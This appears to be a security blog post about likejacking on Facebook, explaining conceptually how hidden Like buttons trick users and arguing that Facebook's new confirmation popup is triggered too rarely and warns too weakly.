Approximately two weeks ago, Facebook deployed a new security countermeasure to attempt to alert users to the scam tactic known as “likejacking.”
Likejacking is a technique in which a spammer creates a website that portrays a fake YouTube-like video player, or other visual lure, and convinces you to click on a button to perform some seemingly normal action, like viewing the video.
What really happens is that you are clicking a Facebook “Like” button that has been hidden underneath the images using a method of coding a webpage called UI redressing.
In the past year, many attacks against Facebook have exploited this technique. Part of the issue with clickjacking/likejacking/UI redressing is that it is technically allowed in the HTML specification.
We have been urging Facebook to require a popup when users click “Like” that warns them that they are choosing to Like something, to ensure they are aware that their click may have been hijacked.
Facebook has responded by implementing a new system that is designed to detect anomalous “Like” patterns and require an additional confirmation for pages that trigger this mechanism. While precise details of how this system detects malicious “Likes” are not available, I have seen it in action and it follows many of the suggestions we have made.
A page that triggers this behavior will display a normal Like button at first. When you click the button (either intentionally, or accidentally in the case of clickjacking) the button changes to Confirm rather than instantly Liking the page.
If you click the button again, it triggers a popup message explaining that you are trying to like the page. This popup is in a separate window, which is important. By making it a popup, they escape the control of the attacker and the page can no longer be modified by the malicious website.
The technical approach to solving this problem is valid, but Facebook’s detection algorithm only seems to work in rare instances. Since the deployment of this technology, I have only seen it trigger in a few likejacking attacks.
Trying to anticipate scams from user behavior is difficult, if not impossible, and large numbers of users would have already fallen prey to the scams before the algorithm that was designed to protect them triggered.
Rather than allowing undetected fraudsters to continue to fly under the radar, the ideal solution would be to provide the verification popup whenever a user wishes to Like a page.
An additional problem is that the warning message displayed does not adequately alert a user that they may be falling for a scam. Many of these scams inform the user they must Like the page to see the salacious content.
Simply confirming that the user wishes to Like the page does not give them any good reason not to. Why not tell users that Facebook suspects this page may be malicious?
It’s encouraging that Facebook is working on this problem, but their solution doesn’t go far enough.